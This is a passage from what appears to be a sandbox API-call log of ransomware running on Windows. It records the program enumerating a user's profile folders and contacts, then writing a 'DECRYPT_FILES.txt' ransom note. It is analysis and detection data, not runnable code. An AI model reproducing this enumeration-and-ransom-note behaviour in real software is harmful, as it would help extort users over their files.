ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", cAlternateFileName="NTUSER~1.BLF")) returned 1 [0052.352] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5e170 | out: lpFindFileData=0x1bf5e170*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0x0, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~1.REG")) returned 1 [0052.352] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5e170 | out: lpFindFileData=0x1bf5e170*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0x0, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~2.REG")) returned 1 [0052.352] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5e170 | out: lpFindFileData=0x1bf5e170*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cd94e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0x0, dwReserved1=0x0, cFileName="ntuser.ini", cAlternateFileName="")) returned 1 [0052.352] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5e170 | out: lpFindFileData=0x1bf5e170*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf1b9e640, ftLastAccessTime.dwHighDateTime=0x1d53bb1, ftLastWriteTime.dwLowDateTime=0xf1b9e640, ftLastWriteTime.dwHighDateTime=0x1d53bb1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0052.352] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5e170 | out: lpFindFileData=0x1bf5e170*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0052.352] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5e170 | out: lpFindFileData=0x1bf5e170*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0052.353] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5e170 | out: lpFindFileData=0x1bf5e170*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0052.353] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5e170 | out: lpFindFileData=0x1bf5e170*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Searches", cAlternateFileName="")) returned 1 [0052.353] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5e170 | out: lpFindFileData=0x1bf5e170*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1 [0052.353] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5e170 | out: lpFindFileData=0x1bf5e170*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0052.353] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5e170 | out: lpFindFileData=0x1bf5e170*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0052.353] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5e170 | out: lpFindFileData=0x1bf5e170*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf1b2c220, ftLastAccessTime.dwHighDateTime=0x1d53bb1, ftLastWriteTime.dwLowDateTime=0xf1b2c220, ftLastWriteTime.dwHighDateTime=0x1d53bb1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0052.353] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5e170 | out: lpFindFileData=0x1bf5e170*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0052.353] FindClose (in: hFindFile=0x1a5ddfd0 | out: hFindFile=0x1a5ddfd0) returned 1 [0052.354] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5e3d0) returned 1 [0052.354] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5e390) returned 1 [0052.354] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5db80) returned 1 [0052.354] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data", nBufferLength=0x105, lpBuffer=0x1bf5d670, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data", lpFilePart=0x0) returned 0x2e [0052.354] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\", nBufferLength=0x105, lpBuffer=0x1bf5d610, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\", lpFilePart=0x0) returned 0x2f [0052.354] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\*", lpFindFileData=0x1bf5d820 | out: lpFindFileData=0x1bf5d820*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0052.354] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5dab0) returned 1 [0052.357] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5db80) returned 1 [0052.357] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts", nBufferLength=0x105, lpBuffer=0x1bf5d670, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts", lpFilePart=0x0) returned 0x26 [0052.357] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", nBufferLength=0x105, lpBuffer=0x1bf5d610, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpFilePart=0x0) returned 0x27 [0052.357] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*", lpFindFileData=0x1bf5d820 | out: lpFindFileData=0x1bf5d820*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5ddfd0 [0052.357] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.357] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ea7ef20, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2ea7ef20, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2ea7ef20, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x49a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Aclviho ASldjfl.contact", cAlternateFileName="ACLVIH~1.CON")) returned 1 [0052.357] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf0fefd94, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x10b1e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Administrator.contact", cAlternateFileName="ADMINI~1.CON")) returned 1 [0052.358] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaa5080, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaa5080, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaa5080, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x493, dwReserved0=0x0, dwReserved1=0x0, cFileName="asdlfk poopvy.contact", cAlternateFileName="ASDLFK~1.CON")) returned 1 [0052.358] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eacb1e0, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eacb1e0, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eacb1e0, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x499, dwReserved0=0x0, dwReserved1=0x0, cFileName="chucu jadnvk.contact", cAlternateFileName="CHUCUJ~1.CON")) returned 1 [0052.358] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0052.358] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x496, dwReserved0=0x0, dwReserved1=0x0, cFileName="lulcit amkdfe.contact", cAlternateFileName="LULCIT~1.CON")) returned 1 [0052.358] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0x0, dwReserved1=0x0, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 1 [0052.358] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0052.358] FindClose (in: hFindFile=0x1a5ddfd0 | out: hFindFile=0x1a5ddfd0) returned 1 [0052.358] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5dad0) returned 1 [0052.358] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5da90) returned 1 [0052.358] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5db80) returned 1 [0052.358] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts", nBufferLength=0x105, lpBuffer=0x1bf5d670, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts", lpFilePart=0x0) returned 0x26 [0052.359] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", nBufferLength=0x105, lpBuffer=0x1bf5d610, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpFilePart=0x0) returned 0x27 [0052.359] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*", lpFindFileData=0x1bf5d820 | out: lpFindFileData=0x1bf5d820*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5ddfd0 [0052.359] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.359] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ea7ef20, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2ea7ef20, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2ea7ef20, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x49a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Aclviho ASldjfl.contact", cAlternateFileName="ACLVIH~1.CON")) returned 1 [0052.359] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf0fefd94, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x10b1e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Administrator.contact", cAlternateFileName="ADMINI~1.CON")) returned 1 [0052.359] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaa5080, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaa5080, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaa5080, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x493, dwReserved0=0x0, dwReserved1=0x0, cFileName="asdlfk poopvy.contact", cAlternateFileName="ASDLFK~1.CON")) returned 1 [0052.359] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eacb1e0, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eacb1e0, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eacb1e0, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x499, dwReserved0=0x0, dwReserved1=0x0, cFileName="chucu jadnvk.contact", cAlternateFileName="CHUCUJ~1.CON")) returned 1 [0052.360] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0052.360] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x496, dwReserved0=0x0, dwReserved1=0x0, cFileName="lulcit amkdfe.contact", cAlternateFileName="LULCIT~1.CON")) returned 1 [0052.360] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0x0, dwReserved1=0x0, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 1 [0052.360] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5d870 | out: lpFindFileData=0x1bf5d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0x0, dwReserved1=0x0, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 0 [0052.360] FindClose (in: hFindFile=0x1a5ddfd0 | out: hFindFile=0x1a5ddfd0) returned 1 [0052.360] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5dad0) returned 1 [0052.360] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5da90) returned 1 [0052.360] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\DECRYPT_FILES.txt", nBufferLength=0x105, lpBuffer=0x1bf5d610, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\DECRYPT_FILES.txt", lpFilePart=0x0) returned 0x38 [0052.360] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5daf0) returned 1 [0052.360] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\DECRYPT_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\decrypt_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x3d8 [0052.361] GetFileType (hFile=0x3d8) returned 0x1 [0052.361] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5da60) returned 1 [0052.361] GetFileType (hFile=0x3d8) returned 0x1 [0052.361] WriteFile (in: hFile=0x3d8, lpBuffer=0x214edf8*, nNumberOfBytesToWrite=0x9d5, lpNumberOfBytesWritten=0x1bf5db38, lpOverlapped=0x0 | out: lpBuffer=0x214edf8*, lpNumberOfBytesWritten=0x1bf5db38*=0x9d5, lpOverlapped=0x0) returned 1 [0052.362] CloseHandle (hObject=0x3d8) returned 1 [0052.362] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5db80) returned 1 [0052.362] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies", nBufferLength=0x105, lpBuffer=0x1bf5d670, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies", lpFilePart=0x0) returned 0x25 [0052.362] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\", nBufferLength=0x105, lpBuffer=0x1bf5d610, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\", lpFilePart=0x0) returned 0x26 [0052.362] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\*", lpFindFileData=0x1bf5d820 | out: lpFindFileData=0x1bf5d820*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0052.363] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5dab0) returned 1 [0052.365] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5db80) returned 1 [0052.365] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x1bf5d670, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", 